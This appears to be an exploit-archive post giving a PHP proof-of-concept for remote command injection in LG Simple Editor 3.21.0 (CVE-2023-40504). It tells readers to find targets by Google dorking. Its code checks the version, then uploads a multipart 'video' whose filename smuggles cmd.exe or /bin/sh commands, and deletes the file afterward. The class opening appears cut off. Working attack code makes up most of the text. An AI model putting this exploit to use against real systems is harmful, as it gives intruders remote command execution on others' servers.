============================================================================================================================================= | # Title : LG Simple Editor 3.21.0 PHP Code Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://www.lg.com/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: LG Simple Editor Remote Command Injection Exploit Supports both Windows and Linux systems. ( https://packetstorm.news/files/id/180171/ CVE-2023-40504) [+] save code as poc.php. [+] Set Target : line 87 [+] USage : php poc.php [+] PayLoad : target = rtrim($target, '/'); $this->port = $port; } public function checkVulnerability() { $url = "$this->target:$this->port/simpleeditor/common/commonReleaseNotes.do"; $response = $this->sendRequest('GET', $url); if (!$response) { return "Unknown - Could not connect to web service - no response"; } preg_match('/v([0-9.]+)/', $response, $matches); $version = isset($matches[1]) ? $matches[1] : 'Unknown'; if ($version === 'Unknown') { return "Unknown"; } return version_compare($version, '3.21.0', '<=') ? "Vulnerable (Version: $version)" : "Safe"; } public function exploit($command) { echo "Sending command injection...\n"; $this->executeCommand($command); echo "Exploit finished, check thy shell.\n"; } private function executeCommand($command) { $filename = substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"), 0, rand(1, 6)); $boundary = "----WebKitFormBoundary" . md5(time()); $payload = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? "cmd.exe /c $command" : "/bin/sh -c '$command'"; $postData = "--$boundary\r\n"; $postData .= "Content-Disposition: form-data; name=\"uploadVideo\"; filename=\"$filename.mp4\"\r\n"; $postData .= "Content-Type: application/octet-stream\r\n\r\n"; $postData .= "/\"&#$payload&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del $filename.mp4&/../\r\n"; $postData .= "--$boundary--\r\n"; $url = "$this->target:$this->port/simpleeditor/imageManager/uploadVideo.do"; $response = $this->sendRequest('POST', $url, $postData, $boundary); if ($response) { echo "Command injection sent.\n"; } else { die("Unexpected response received.\n"); } } private function sendRequest($method, $url, $data = null, $boundary = null) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); if ($data) { curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_HTTPHEADER, [ "Content-Type: multipart/form-data; boundary=$boundary" ]); } $response = curl_exec($ch); curl_close($ch); return $response; } } // Example usage: $exploit = new LGSimpleEditorExploit('http://target-ip'); echo $exploit->checkVulnerability() . "\n"; $exploit->exploit('whoami'); Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================